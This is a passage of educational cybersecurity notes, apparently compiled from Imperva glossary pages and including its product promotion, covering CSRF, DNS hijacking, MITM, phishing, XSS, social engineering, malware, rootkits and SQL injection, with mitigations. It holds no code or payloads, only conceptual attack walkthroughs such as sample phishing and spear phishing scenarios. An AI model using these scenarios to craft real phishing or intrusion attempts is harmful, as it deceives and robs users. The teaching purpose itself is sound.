A successful CSRF attack can be devastating for both the business and user. It can result
in damaged client relationships, unauthorized fund transfers, changed passwords and data
theft—including stolen session cookies.
CSRFs are typically conducted using malicious social engineering, such as an email or
link that tricks the victim into sending a forged request to a server. As the unsuspecting
user is authenticated by their application at the time of the attack, it’s impossible to
distinguish a legitimate request from a forged one.
One of the most frequent targets are websites that allow users to share content, including
blogs, social networks, video sharing platforms and message boards. Every time the
infected page is viewed, the malicious script is transmitted to the victim’s browser.
DOMAIN NAME SERVER (DNS) HIJACKING-
Domain Name Server (DNS) hijacking, also named DNS redirection, is a type of DNS
attack in which DNS queries are incorrectly resolved in order to unexpectedly redirect
33
users to malicious sites. To perform the attack, perpetrators either install malware on user
computers, take over routers, or intercept or hack DNS communication.
DNS hijacking can be used for pharming (in this context, attackers typically display
unwanted ads to generate revenue) or for phishing (displaying fake versions of sites users
access and stealing data or credentials).
Many Internet Service Providers (ISPs) also use a type of DNS hijacking, to take over a
user’s DNS requests, collect statistics and return ads when users access an unknown
domain. Some governments use DNS hijacking for censorship, redirecting users to
government-authorized sites.
DNS HIJACKING ATTACK TYPES
There are four basic types of DNS redirection:
o Local DNS hijack — attackers install Trojan malware on a user’s computer, and
change the local DNS settings to redirect the user to malicious sites.
o Router DNS hijack — many routers have default passwords or firmware
vulnerabilities. Attackers can take over a router and overwrite DNS settings,
affecting all users connected to that router.
o Man in the middle DNS attacks — attackers intercept communication between a
user and a DNS server, and provide different destination IP addresses pointing to
malicious sites.
o Rogue DNS Server — attackers can hack a DNS server, and change DNS records
to redirect DNS requests to malicious sites.
34
Example of DNS Hijacking
REDIRECTION VS. DNS SPOOFING ATTACK
DNS spoofing is an attack in which traffic is redirected from a legitimate website such as
www.google.com, to a malicious website such as google.attacker.com. DNS spoofing can
be achieved by DNS redirection. For example, attackers can compromise a DNS server,
and in this way “spoof” legitimate websites and redirect users to malicious ones.
Cache poisoning is another way to achieve DNS spoofing, without relying on DNS
hijacking (physically taking over the DNS settings). DNS servers, routers and computers
cache DNS records. Attackers can “poison” the DNS cache by inserting a forged DNS
entry, containing an alternative IP destination for the same domain name. The DNS
server resolves the domain to the spoofed website, until the cache is refreshed.
METHODS OF MITIGATION
MITIGATION FOR NAME SERVERS AND RESOLVERS
A DNS name server is a highly sensitive infrastructure which requires strong security
measures, as it can be hijacked and used by hackers to mount DDoS attacks on others:
Watch for resolvers on your network — unneeded DNS resolvers should be shut down.
Legitimate resolvers should be placed behind a firewall with no access from outside the
organization.
35
Severely restrict access to a name server — both physical security, multi-factor access,
firewall and network security measures should be used.
Take measures against cache poisoning — use a random source port, randomize query
ID, and randomize upper/lower case in domain names.
Immediately patch known vulnerabilities — hackers actively search for vulnerable DNS
servers.
Separate authoritative name server from resolver — don’t run both on the same server, so
a DDoS attack on either component won’t take down the other one.
Restrict zone transfers — slave name servers can request a zone transfer, which is a
partial copy of your DNS records. Zone records contain information that is valuable to
attackers.
MITIGATION FOR END USERS
End users can protect themselves against DNS hijacking by changing router passwords,
installing antivirus, and using an encrypted VPN channel. If the user’s ISP is hijacking
their DNS, they can use a free, alternative DNS service such as Google Public DNS,
Google DNS over HTTPS, and Cisco OpenDNS.
DNS SPOOFING- Domain Name Server (DNS) spoofing (a.k.a. DNS cache poisoning) is an
attack in which altered DNS records are used to redirect online traffic to a fraudulent website that
resembles its intended destination.
Once there, users are prompted to login into (what they believe to be) their account,
giving the perpetrator the opportunity to steal their access credentials and other types of
sensitive information. Furthermore, the malicious website is often used to install worms
or viruses on a user’s computer, giving the perpetrator long-term access to it and the data
it stores.
Methods for executing a DNS spoofing attack include:
o Man in the middle (MITM) – The interception of communications between
users and a DNS server in order to route users to a different/malicious IP address.
o DNS server compromise – The direct hijacking of a DNS server, which is
configured to return a malicious IP address.
36
37
The goal of an attack is to steal personal information, such as login credentials, account
details and credit card numbers. Targets are typically the users of financial applications,
SaaS businesses, e-commerce sites and other websites where logging in is required.
Information obtained during an attack could be used for many purposes, including
identity theft, unapproved fund transfers or an illicit password change.
Additionally, it can be used to gain a foothold inside a secured perimeter during the
infiltration stage of an advanced persistent threat (APT) assault.
Broadly speaking, a MITM attack is the equivalent of a mailman opening your bank
statement, writing down your account details and then resealing the envelope and
delivering it to your door.
Successful MITM execution has two distinct phases: interception and decryption.
INTERCEPTION
The first step intercepts user traffic through the attacker’s network before it reaches its
intended destination.
The most common (and simplest) way of doing this is a passive attack in which an
attacker makes free, malicious WiFi hotspots available to the public. Typically named in
a way that corresponds to their location, they aren’t password protected. Once a victim
connects to such a hotspot, the attacker gains full visibility to any online data exchange.
Attackers wishing to take a more active approach to interception may launch one of the
following attacks:
IP spoofing involves an attacker disguising himself as an application by altering packet
headers in an IP address. As a result, users attempting to access a URL connected to the
application are sent to the attacker’s website.
ARP spoofing is the process of linking an attacker’s MAC address with the IP address of
a legitimate user on a local area network using fake ARP messages. As a result, data sent
by the user to the host IP address is instead transmitted to the attacker.
38
DNS spoofing, also known as DNS cache poisoning, involves infiltrating a DNS server
and altering a website’s address record. As a result, users attempting to access the site are
sent by the altered DNS record to the attacker’s site.
DECRYPTION
After interception, any two-way SSL traffic needs to be decrypted without alerting the
user or application. A number of methods exist to achieve this:
HTTPS spoofing sends a phony certificate to the victim’s browser once the initial
connection request to a secure site is made. It holds a digital thumbprint associated with
the compromised application, which the browser verifies according to an existing list of
trusted sites. The attacker is then able to access any data entered by the victim before it’s
passed to the application.
SSL BEAST (browser exploit against SSL/TLS) targets a TLS version 1.0 vulnerability
in SSL. Here, the victim’s computer is infected with malicious JavaScript that intercepts
encrypted cookies sent by a web application. Then the app’s cipher block chaining (CBC)
is compromised so as to decrypt its cookies and authentication tokens.
SSL hijacking occurs when an attacker passes forged authentication keys to both the user
and application during a TCP handshake. This sets up what appears to be a secure
connection when, in fact, the man in the middle controls the entire session.
SSL stripping downgrades a HTTPS connection to HTTP by intercepting the TLS
authentication sent from the application to the user. The attacker sends an unencrypted
version of the application’s site to the user while maintaining the secured session with the
application. Meanwhile, the user’s entire session is visible to the attacker.
MAN IN THE MIDDLE ATTACK PREVENTION
Blocking MITM attacks requires several practical steps on the part of users, as well as a
combination of encryption and verification methods for applications.
For users, this means:
Avoiding WiFi connections that aren’t password protected.
Paying attention to browser notifications reporting a website as being unsecured.
Immediately logging out of a secure application when it’s not in use.
Not using public networks (e.g., coffee shops, hotels) when conducting sensitive
transactions.
PHISHING ATTACKS-
Phishing is a type of social engineering attack often used to steal user data, including
login credentials and credit card numbers. It occurs when an attacker, masquerading as a
trusted entity, dupes a victim into opening an email, instant message, or text message.
The recipient is then tricked into clicking a malicious link, which can lead to the
installation of malware, the freezing of the system as part of a ransomware attack or the
revealing of sensitive information.
An attack can have devastating results. For individuals, this includes unauthorized
purchases, the stealing of funds, or identify theft.
Moreover, phishing is often used to gain a foothold in corporate or governmental
networks as a part of a larger attack, such as an advanced persistent threat (APT) event.
39
In this latter scenario, employees are compromised in order to bypass security perimeters,
distribute malware inside a closed environment, or gain privileged access to secured data.
An organization succumbing to such an attack typically sustains severe financial losses in
addition to declining market share, reputation, and consumer trust. Depending on scope, a
phishing attempt might escalate into a security incident from which a business will have a
difficult time recovering.
PHISHING ATTACK EXAMPLES
The following illustrates a common phishing scam attempt:
A spoofed email ostensibly from myuniversity.edu is mass-distributed to as many faculty
members as possible.
The email claims that the user’s password is about to expire. Instructions are given to go
to myuniversity.edu/renewal to renew their password within 24 hours.
Several things can occur by clicking the link. For example:
The user is redirected to myuniversity.edurenewal.com, a bogus page appearing exactly
like the real renewal page, where both new and existing passwords are requested. The
attacker, monitoring the page, hijacks the original password to gain access to secured
areas on the university network.
The user is sent to the actual password renewal page. However, while being redirected, a
malicious script activates in the background to hijack the user’s session cookie. This
40
results in a reflected XSS attack, giving the perpetrator privileged access to the university
network.
PHISHING TECHNIQUES
EMAIL PHISHING SCAMS
Email phishing is a numbers game. An attacker sending out thousands of fraudulent
messages can net significant information and sums of money, even if only a small
percentage of recipients fall for the scam. As seen above, there are some techniques
attackers use to increase their success rates.
For one, they will go to great lengths in designing phishing messages to mimic actual
emails from a spoofed organization. Using the same phrasing, typefaces, logos, and
signatures makes the messages appear legitimate.
In addition, attackers will usually try to push users into action by creating a sense of
urgency. For example, as previously shown, an email could threaten account expiration
and place the recipient on a timer. Applying such pressure causes the user to be less
diligent and more prone to error.
Lastly, links inside messages resemble their legitimate counterparts, but typically have a
misspelled domain name or extra subdomains. In the above example,
the myuniversity.edu/renewal URL was changed to myuniversity.edurenewal.com.
Similarities between the two addresses offer the impression of a secure link, making the
recipient less aware that an attack is taking place.
SPEAR PHISHING
Spear phishing targets a specific person or enterprise, as opposed to random application
users. It’s a more in depth version of phishing that requires special knowledge about an
organization, including its power structure.
An attack might play out as follows:
A perpetrator researches names of employees within an organization’s marketing
department and gains access to the latest project invoices.
Posing as the marketing director, the attacker emails a departmental project manager
(PM) using a subject line that reads, Updated invoice for Q3 campaigns. The text, style,
and included logo duplicate the organization’s standard email template.
A link in the email redirects to a password-protected internal document, which is in
actuality a spoofed version of a stolen invoice.
The PM is requested to log in to view the document. The attacker steals his credentials,
gaining full access to sensitive areas within the organization’s network.
41
By providing an attacker with valid login credentials, spear phishing is an effective
method for executing the first stage of an APT.
PHISHING PROTECTION
Phishing attack protection requires steps be taken by both users and enterprises.
For users, vigilance is key. A spoofed message often contains subtle mistakes that expose
its true identity. These can include spelling mistakes or changes to domain names, as seen
in the earlier URL example. Users should also stop and think about why they’re even
receiving such an email.
For enterprises, a number of steps can be taken to mitigate both phishing and spear
phishing attacks:
Two-factor authentication (2FA) is the most effective method for countering phishing
attacks, as it adds an extra verification layer when logging in to sensitive applications.
2FA relies on users having two things: something they know, such as a password and
user name, and something they have, such as their smartphones. Even when employees
are compromised, 2FA prevents the use of their compromised credentials, since these
alone are insufficient to gain entry.
In addition to using 2FA, organizations should enforce strict password management
policies. For example, employees should be required to frequently change their
passwords and to not be allowed to reuse password for multiple applications.
Educational campaigns can also help diminish the threat of phishing attacks by enforcing
secure practices, such as not clicking on external email links.
REFLECTED CROSS SITE SCRIPTING (XSS) ATTACKS
- Cross-site scripting (XSS) is a web application vulnerability that permits an attacker to
inject code, (typically HTML or JavaScript), into the contents of an outside website.
When a victim views an infected page on the website, the injected code executes in the
victim’s browser. Consequently, the attacker has bypassed the browser’s same origin
policy and is able to steal private information from a victim associated with the website.
Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is
reflected off of a web application to the victim’s browser.
The script is activated through a link, which sends a request to a website with a
vulnerability that enables execution of malicious scripts. The vulnerability is typically a
result of incoming requests not being sufficiently sanitized, which allows for the
manipulation of a web application’s functions and the activation of malicious scripts.
To distribute the malicious link, a perpetrator typically embeds it into an email or third
party website (e.g., in a comment section or in social media). The link is embedded inside
an anchor text that provokes the user to clicking on the it, which initiates the XSS request
to an exploited website, reflecting the attack back to the user.
42
Unlike a stored attack, where the perpetrator must locate a website that allows for
permanent injection of malicious scripts, reflected attacks only require that the malicious
script be embedded into a link. That being said, in order for the attack to be successful,
the user needs to click on the infected link.
As such, there are a number of key differences between reflected and stored XSS attacks,
including:
Reflected attacks are more common.
Reflected attacks do not have the same reach as stored XSS attacks.
Reflected attacks can be avoided by vigilant users.
With a reflected XSS, the perpetrator plays a “numbers game” by sending the malicious
link to as many users as possible, thereby improving his odds of successfully executing
the attack.
SOCIAL ENGINEERING- social engineering is the term used for a broad range of malicious
activities accomplished through human interactions. It uses psychological manipulation to trick
users into making security mistakes or giving away sensitive information.
Social engineering attacks happen in one or more steps. A perpetrator first investigates
the intended victim to gather necessary background information, such as potential points
of entry and weak security protocols, needed to proceed with the attack. Then, the
attacker moves to gain the victim’s trust and provide stimuli for subsequent actions that
break security practices, such as revealing sensitive information or granting access to
critical resources.
43
Social engineering attack lifecycle
What makes social engineering especially dangerous is that it relies on human error,
rather than vulnerabilities in software and operating systems. Mistakes made by
legitimate users are much less predictable, making them harder to identify and thwart
than a malware-based intrusion.
SOCIAL ENGINEERING ATTACK TECHNIQUES
Social engineering attacks come in many different forms and can be performed anywhere
where human interaction is involved. The following are the five most common forms of
digital social engineering assaults.
Baiting
As its name implies, baiting attacks use a false promise to pique a victim’s greed or
curiosity. They lure users into a trap that steals their personal information or inflicts their
systems with malware.
The most reviled form of baiting uses physical media to disperse malware. For example,
attackers leave the bait—typically malware-infected flash drives—in conspicuous areas
where potential victims are certain to see them (e.g., bathrooms, elevators, the parking lot
of a targeted company). The bait has an authentic look to it, such as a label presenting it
as the company’s payroll list.
Victims pick up the bait out of curiosity and insert it into a work or home computer,
resulting in automatic malware installation on the system.
Baiting scams don’t necessarily have to be carried out in the physical world. Online
forms of baiting consist of enticing ads that lead to malicious sites or that encourage users
to download a malware-infected application.
44
Scareware
Scareware involves victims being bombarded with false alarms and fictitious threats.
Users are deceived to think their system is infected with malware, prompting them to
install software that has no real benefit (other than for the perpetrator) or is malware
itself. Scareware is also referred to as deception software, rogue scanner software and
fraudware.
A common scareware example is the legitimate-looking popup banners appearing in your
browser while surfing the web, displaying such text such as, “Your computer may be
infected with harmful spyware programs.” It either offers to install the tool (often
malware-infected) for you, or will direct you to a malicious site where your computer
becomes infected.
Scareware is also distributed via spam email that doles out bogus warnings, or makes
offers for users to buy worthless/harmful services.
Pretexting
Here an attacker obtains information through a series of cleverly crafted lies. The scam is
often initiated by a perpetrator pretending to need sensitive information from a victim so
as to perform a critical task.
The attacker usually starts by establishing trust with their victim by impersonating co-
workers, police, bank and tax officials, or other persons who have right-to-know
authority. The pretexter asks questions that are ostensibly required to confirm the
victim’s identity, through which they gather important personal data.
All sorts of pertinent information and records is gathered using this scam, such as social
security numbers, personal addresses and phone numbers, phone records, staff vacation
dates, bank records and even security information related to a physical plant.
Phishing
As one of the most popular social engineering attack types, phishing scams are email and
text message campaigns aimed at creating a sense of urgency, curiosity or fear in victims.
It then prods them into revealing sensitive information, clicking on links to malicious
websites, or opening attachments that contain malware.
An example is an email sent to users of an online service that alerts them of a policy
violation requiring immediate action on their part, such as a required password change. It
includes a link to an illegitimate website—nearly identical in appearance to its legitimate
version—prompting the unsuspecting user to enter their current credentials and new
password. Upon form submittal the information is sent to the attacker.
Given that identical, or near-identical, messages are sent to all users in phishing
campaigns, detecting and blocking them are much easier for mail servers having access to
threat sharing platforms.
Spear phishing
45
This is a more targeted version of the phishing scam whereby an attacker chooses specific
individuals or enterprises. They then tailor their messages based on characteristics, job
positions, and contacts belonging to their victims to make their attack less
conspicuous. Spear phishing requires much more effort on behalf of the perpetrator and
may take weeks and months to pull off. They’re much harder to detect and have better
success rates if done skillfully.
A spear phishing scenario might involve an attacker who, in impersonating an
organization’s IT consultant, sends an email to one or more employees. It’s worded and
signed exactly as the consultant normally does, thereby deceiving recipients into thinking
it’s an authentic message. The message prompts recipients to change their password and
provides them with a link that redirects them to a malicious page where the attacker now
captures their credentials.
SOCIAL ENGINEERING PREVENTION
Social engineers manipulate human feelings, such as curiosity or fear, to carry out
schemes and draw victims into their traps. Therefore, be wary whenever you feel alarmed
by an email, attracted to an offer displayed on a website, or when you come across stray
digital media lying about. Being alert can help you protect yourself against most social
engineering attacks taking place in the digital realm.
Moreover, the following tips can help improve your vigilance in relation to social
engineering hacks.
Don’t open emails and attachments from suspicious sources – If you don’t know the
sender in question, you don’t need to answer an email. Even if you do know them and are
suspicious about their message, cross-check and confirm the news from other sources,
such as via telephone or directly from a service provider’s site. Remember that email
addresses are spoofed all of the time; even an email purportedly coming from a trusted
source may have actually been initiated by an attacker.
Use multifactor authentication – One of the most valuable pieces of information attackers
seek are user credentials. Using multifactor authentication helps ensure your account’s
protection in the event of system compromise. Imperva Login Protect is an easy-to-
deploy 2FA solution that can increase account security for your applications.
Be wary of tempting offers – If an offer sounds too enticing, think twice before accepting
it as fact. Googling the topic can help you quickly determine whether you’re dealing with
a legitimate offer or a trap.
Keep your antivirus/antimalware software updated – Make sure automatic updates are
engaged, or make it a habit to download the latest signatures first thing each day.
Periodically check to make sure that the updates have been applied, and scan your system
for possible infections.
MALWARE TYPES- WHAT IS MALWARE
Malware refers to malicious software perpetrators dispatch to infect individual computers
or an entire organization’s network. It exploits target system vulnerabilities, such as a bug
in legitimate software (e.g., a browser or web application plugin) that can be hijacked.
46
A malware infiltration can be disastrous—consequences include data theft, extortion or
the crippling of network systems.
COMMON MALWARE TYPES
There are numerous malware types, each having their own application area and focus.
Seven of the most common variations are as follows:
Ransomware – Once installed, this malware encrypts files on a computer and/or across an
extended network. A popup display informs the user that unless a ransom is paid, their
files will remain encrypted.
47
Perpetrators use worms to create botnets from a large numbers of compromised
connected devices (e.g., mobile phones or PCs). Such devices are known as “zombies”
because their owners are oblivious to the infection and that their systems are used as part
of a much larger attack, such as a distributed denial of service (DDoS).
Worm examples include:
NgrBot – This worm propagates through chat messengers and social networking sites.
Perpetrators use social engineering to encourage downloading of the malware that, once
installed, turns the user’s machine into a zombie participating in a massive botnet. It also
stops infected systems from being updated and can steal login credentials and other
sensitive information.
ILOVEYOU – This has been deployed using a social engineering attack that encouraged
people, through the enticement of a possible love interest, to open an email attachment
containing the worm. A Visual Basic script is run that then overwrites various file types.
The worm has infected an estimated 45 million computers.
Trojan – A Trojan appears legitimate but carries a dangerous payload. While it doesn’t
replicate itself as do worms, it typically comes packaged with additional malware types—
including backdoors, rootkits, ransomware and spyware.
The banking industry is a favorite target of Trojan attacks. For instance, the Tiny Banker
Trojan (Tinba) malware, which is executed via the Rig exploit kit. Installation is achieved
by first locating a software vulnerability on the target computer. It then overlays a
spoofed screen requesting personal information, including credit card details, whenever
the system user visits a bank site (see below).
48
Tiny Banker Trojan being used to dupe Wells Fargo users into disclosing sensitive
information
Rootkits –
These are a prepared, customizable software. They grant access to sensitive parts of an
application, enable the execution of files and can even change system configurations.
Typically deployed through a social engineering attack (e.g., phishing)—resulting in the
theft of a user’s login credentials—its installation gains access to a network. The rootkit
can then subvert any anti-malware software that might otherwise be able to detect it,
giving the perpetrator free reign to install additional malware.
Examples of rootkits include Flame, used in cyberespionage attacks to steal screenshots,
record keystrokes and monitor network traffic. It was most notably used to disrupt Iranian
oil refinery production in 2012.
49
Backdoors – A backdoor negates normal authentication required to access a system, such
as via a webserver or database. Often its installation is part of a targeted assault; after
researching a victim, social engineering is used to steal login credentials and gain access
to an application.
Backdoors avoid detection and are used to set up a control center. This lets the
perpetrator remotely update malware and initiate system commands.
Backdoors are used for many malicious activities, including data theft, denial of service
assaults and infection of your visitors’ computers. It’s also an initial step when executing
an advanced persistent threat (APT) assaults.
Backdoors have recently been found in a number of Internet of Things (IoT) devices,
such as security Wi-Fi cameras used by organizations. Once an IoT device has been
hacked and turned into a backdoor, it effectively provides a gateway into that network.
Adware – One of the earliest malware types, adware originated in the days of freeware.
The software was free, but included popup ads that appeared whenever you used it. While
annoying, it wasn’t malicious.
Today your system can be infected from visiting a compromised website where its
malware-laden adware, using a browser vulnerability, installs itself.
Spyware – This malware variant gathers personal data and sends it to a third-party
without your knowledge or consent.
A highly malicious spyware type is a keylogger. Once installed, it tracks keyboard entries
and sends the data, including login credentials, to the perpetrator.
MALWARE DETECTION AND REMOVAL
Imperva has a number services that prevent malware installation while weeding out
existing infections on web application servers.
Web Application Firewall (WAF) –Deployed at the edge of your network, Imperva cloud
PCI DSS compliant service uses signature, behavioral and reputational analysis to block
all malware injection attacks on your websites and web applications. Imperva cloud WAF
is offered as a managed service and maintained by a dedicated security team.
Backdoor Protect – A service that intercepts communication attempts with backdoor
shells on your web server. By tracing these requests, the service is able to pinpoint the
most highly obfuscated malware, even if it was installed on your web server long before
you onboarded Imperva cloud security services.
Login Protect – A flexible two-factor authentication (2FA) solution that requires zero
integration and can be instantly deployed on any Imperva cloud-protected URL address.
The service prevents perpetrators from using stolen login credentials to obtain network
access and install rootkits and backdoors on your web servers.
ROOTKIT-
A rootkit is a software program, typically malicious, that provides privileged, root-
level (i.e., administrative) access to a computer while concealing its presence on that
machine. Simply put, it is a nasty type of malware that can severely impact your PC’s
performance and also put your personal data at risk.
50
Once installed, a rootkit typically boots at the same time as the computer’s operating
system, or after the boot process begins. There are, however, rootkits that can boot up
before the target operating system, making them very difficult to detect.
Potential consequences of a rootkit include:
Concealed malware – Rootkits allow attackers to install additional malware on infected
computers. They hide malicious programs from users and any anti-virus software
installed on a computer.
Information theft – Malicious software installed with the aid of rootkits can be used to
steal user passwords, credit card information, or other sensitive data without being
detected.
File deletion – Rootkits can delete operating system code or other files on a system.
Eavesdropping – Hackers can use rootkits to eavesdrop on users and intercept their
personal information.
File execution – After subverting anti-malware software on a system, rootkits allow
perpetrators to remotely execute other files on target computers.
Remote access – Rootkits can alter system configuration settings, such as opening up
backdoor TCP ports in firewall settings, or altering startup scripts. This grants attackers
remote access, allowing them, for example, to use the computer in a botnet.
ROOTKIT INJECTION
There are a number of ways that a rootkit can stealthily be installed on your system.
These include:
PIGGYBACKING
Users can unknowingly install rootkits that have been bundled with apparently
trustworthy software. When the administrator gives permission to install the software, the
rootkit also silently installs on the computer.
In 2005, Sony secretly bundled a rootkit with its Extended Copy Protection software,
which came with millions of Sony CDs. The rootkit modified host operating systems and
tried to prevent users from making copies of CDs. However, hackers were able to exploit
vulnerabilities in Sony’s rootkit to gain malicious access to the affected systems.
BLENDED THREAT
A rootkit cannot infect target computers on its own. In order to spread a rootkit, attackers
form a blended threat to exploit several different vulnerabilities and infiltrate a system.
This is achieved by combining the rootkit with two other components—a dropper, and a
loader.
Dropper – A dropper is a program or a file used to install a rootkit on a target computer.
Droppers can be distributed in a number of ways, including through social engineering or
a brute force attack, in which a perpetrator uses a program to repeatedly guess a system’s
root username and password.
Loader – A loader is malicious code that launches after a user initiates the dropper
program, either by opening or executing a file. The loader exploits vulnerabilities to
51
ensure the rootkit loads together with the target system. For example, a kernel-level
rootkit might use a loader that exploits a Linux vulnerability to replace operating system
code with a rewritten Loadable Kernel Module.
Example of a two-stage kernel rootkit injection
ROOTKIT TYPES
There are a number of types of rootkits that can be installed on a target system. Some
examples include:
User-mode or application rootkit – These are installed in a shared library and operate at
the application layer, where they can modify application and API behavior. User-mode
rootkits are relatively easy to detect because they operate at the same layer as anti-virus
programs.
Kernel-mode – These rootkits are implemented within an operating system’s kernel
module, where they can control all system processes. In addition to being difficult to
detect, kernel-mode rootkits can also impact the stability of the target system.
Bootkits – These rootkits gain control of a target system by infecting its master boot
record (MBR). Bootkits allow a malicious program to execute before the target operating
system loads.
Firmware rootkits – These rootkits gain access to the software that runs devices, such as
routers, network cards, hard drives or system BIOS.
Rootkit hypervisors – These rootkits exploit hardware virtualization features to gain
control of a machine. This is done by bypassing the kernel and running the target
operating system in a virtual machine. Hypervisors are almost impossible to detect and
clean because they operate at a higher level than the operating system, and can intercept
all hardware calls made by the target operating system.
ANTI-ROOTKIT MEASURES
Protecting your systems from rootkits is a two-pronged process involving scanning for
existing malware and preventing the installation of new programs.
52
ROOTKIT SCANNERS
Scanners are programs designed to parse a system in order to weed out active rootkits.
While scanners can help detect and remove application-layer rootkits, they’re typically
ineffective against those operating at the kernel, boot or firmware level. Scanners that can
search for malicious code at the kernel level can only run when the rootkit is inactive.
This means that a system has to be booted in safe mode with system processes stopped in
order to be effective.
It’s because of these limitation that security experts recommend using several scanners
and rootkit removers, as no individual tool can guarantee that a system is completely
clean.
To fully secure your system from rootkits operating at the boot, firmware or hypervisor
level, the only remedy is to backup data, then wipe the device and perform a clean install.
PREEMPTIVE BLOCKING
Rootkit prevention is based on the idea that a rootkit can be delivered onto your system
via both individual users and web facing assets (i.e., websites).
The first preventative measure is user education for everyone in your organization. This
should involve instructions on how to detect malicious links and email attachments, as
well as rules against downloading or opening files from unknown sources.
Users should also be trained to identify and avoid phishing attempts, in which malicious
messages, websites or files surreptitiously appear to come from legitimate sources. This
is especially important for users with administrative privileges.
Additional measures preventing rootkits include:
Keeping software updated and patching known vulnerabilities in applications and
operating systems.
Running anti-virus and occasionally running anti-rootkit tools on sensitive machines.
Behavioral-based detection, which analyzes system behavior to discover suspicious
patterns of API calls or CPU usage, which may indicate a rootkit.
Close examination of network logs from packet analyzers, firewalls, or other network
tools to identify rootkits communicating with a remote control center.
IMPERVA ROOTKIT DETECTION AND REMOVAL
Imperva provides a number of solutions to block rootkit installation, as well as to detect
existing rootkits that might have been installed prior to onboarding our services.
WEB APPLICATION FIREWALL (WAF)
Imperva WAF acts as a gateway for incoming traffic to web applications and websites,
using behavioral analysis to block rootkit injection attempts.
BACKDOOR PROTECT
Imperva Backdoor Protect is a shell detection service that closely tracks incoming
requests, helping to pinpoint and quarantine backdoor files so they can be safely
removed.
LOGIN PROTECT
53
Login Protect is a two-factor authentication service. It prevents perpetrators from using
stolen login credentials to obtain server access and install rootkits. With Login Protect,
passwords alone no longer suffice for gaining administrative access to a system.
SPEAR PHISHING-
Spear phishing is a social engineering attack in which a perpetrator, disguised as a
trusted individual, tricks a target into clicking a link in a spoofed email, text message or
instant message. As a result, the target unwittingly reveals sensitive information, installs
malicious programs (malware) on their network or executes the first stage of
an advanced persistent threat (APT), to name a few of the possible consequences.
While similar to phishing and whaling attacks, spear phishing is launched in a unique
way and its targets differ from other social engineering assaults. As a result, the attack
deserves special attention when formulating your application security strategy.
SPEAR PHISHING EXAMPLE
The following example illustrates a spear phishing attack’s progression and potential
consequences:
A spoofed email is sent to an enterprise’s sysadmin from someone claiming to
represent www.itservices.com, a database management SaaS provider. The email uses
the itservices.com customer mailing template.
The email claims that itservices.com is offering a free new service for a limited time and
invites the user to sign up for the service using the enclosed link.
54
After clicking on the link, the sysadmin is redirected to a login page on itservice.com, a
fake website identical to the itservices.com registration page.
At the same time, a command and control agent is installed on the sysadmin’s machine,
which can then be used as a backdoor into the enterprise’s network to execute the first
stage of an APT.
SPEAR PHISHING VS. PHISHING AND WHALING ATTACKS
Spear phishing, phishing and whaling attacks vary in their levels of sophistication and
intended targets. Their differences are highlighted below.
PHISHING
Phishing involves sending malicious emails from supposed trusted sources to as many
people as possible, assuming a low response rate. For example, a phishing email might
purport to be from PayPal and ask a recipient to verify their account details by clicking
on an enclosed link, which leads to the installation of malware on the victim’s computer.
Phishing emails are impersonal, sent in bulk and often contain spelling errors or other
mistakes that reveal their malicious intent. The problem is that not everyone notices these
subtle hints. Trusted logos and links to known destinations are enough to trick many
people into sharing their details.
Spear phishing emails, on the other hand, are more challenging to detect because they
appear to come from sources close to the target. Cyber-criminals send personalized
emails to particular individuals or groups of people with something in common, such as
employees working in the same department.
WHALING
Whaling uses deceptive email messages targeting high-level decision makers within an
organization, such as CEOs, CFOs, and other executives. Such individuals have access to
highly valuable information, including trade secrets and passwords to administrative
company accounts.
The attacker sends emails on issues of critical business importance, masquerading as an
individual or organization with legitimate authority. For example, an attacker may send
an email to a CEO requesting payment, pretending to be a client of the company.
Whaling attacks always personally address targeted individuals, often using their title,
position and phone number, which are obtained using company websites, social media or
the press.
The difference between whaling and spear phishing is that whaling exclusively targets
high-ranking individuals within an organization, while spear phishing usually goes after a
category of individuals with a lower profile.
SPEAR PHISHING MITIGATION
The targeted nature of spear phishing attacks makes them difficult to detect. However,
several risk prevention measures can help, including two-factor authentication (2FA),
password management policies and educational campaigns.
55
TWO FACTOR AUTHENTICATION
2FA helps secure login to sensitive applications by requiring users to have two things:
something they know, such as a password and user name, and something they have, such
as a smartphone or cryptographic token. When 2FA is used, even if a password is
compromised using a technique like spear phishing, it’s of no use to an attacker without
the physical device held by the real user.
PASSWORD MANAGEMENT POLICIES
A prudent password management policy should take steps to prevent employees from
using corporate access passwords on fake external websites.
One example of such a policy is to instruct employees to always enter a false password
when accessing a link provided by email. A legitimate website won’t accept a false
password, but a phishing site will.
EDUCATIONAL CAMPAIGNS
At the organizational level, enterprises can raise awareness and actively train employees,
highlighting spear phishing attacks as an important threat. Training materials can feature
real-life examples of spear phishing, with questions designed to test employee
knowledge. Employees who are aware of spear phishing are less likely to fall victim to an
attack.
SQL (STRUCTURED QUERY LANGUAGE) INJECTION- SQL injection, also known
as SQLI, is a common attack vector that uses malicious SQL code for backend database
manipulation to access information that was not intended to be displayed. This information
may include any number of items, including sensitive company data, user lists or private
customer details.
The impact SQL injection can have on a business is far reaching. A successful attack may
result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain
cases, the attacker gaining administrative rights to a database, all of which are highly
detrimental to a business.
When calculating the potential cost of a SQLI, it’s important to consider the loss of
customer trust should personal information such as phone numbers, addresses and credit
card details be stolen.
While this vector can be used to attack any SQL database, websites are the most frequent
targets.
SQLI PREVENTION AND MITIGATION
There are several effective ways to prevent SQLI attacks from taking place, as well as
protecting against them, should they occur.
The first step is input validation (a.k.a. sanitization), which is the practice of writing code
that can identify illegitimate user inputs.
56
While input validation should always be considered best practice, it is rarely a foolproof
solution. The reality is that, in most cases, it is simply not feasible to map out all legal
and illegal inputs—at least not without causing a large amount of false positives, which
interfere with user experience and an application’s functionality.
For this reason, a web application firewall (WAF) is commonly employed to filter out
SQLI, as well as other online threats. To do so, a WAF typically relies on a large, and
constantly updated, list of meticulously crafted signatures that allow it to surgically weed
out malicious SQL queries. Usually, such a list holds signatures to address specific attack
vectors, and is regularly patched to introduce blocking rules for newly discovered
vulnerabilities.
Modern web application firewalls are also often integrated with other security solutions.
From these, a WAF can receive additional information that further augments its security
capabilities.
For example, a web application firewall that encounters a suspicious, but not outright
malicious, input may be cross-verify it with IP data before deciding to block the request.
It only blocks the input if the IP itself has a bad reputational history.
Imperva cloud-based WAF uses signature recognition, IP reputation and other security
methodologies to identify and block SQL injections, with a minimal amount of false
positives. The WAF’s capabilities are augmented by IncapRules—a custom security rule
engine that enables granular customization of default security settings and the creation of
additional case-specific security policies.
Our WAF also employs crowdsourcing techniques that ensure that new threats targeting
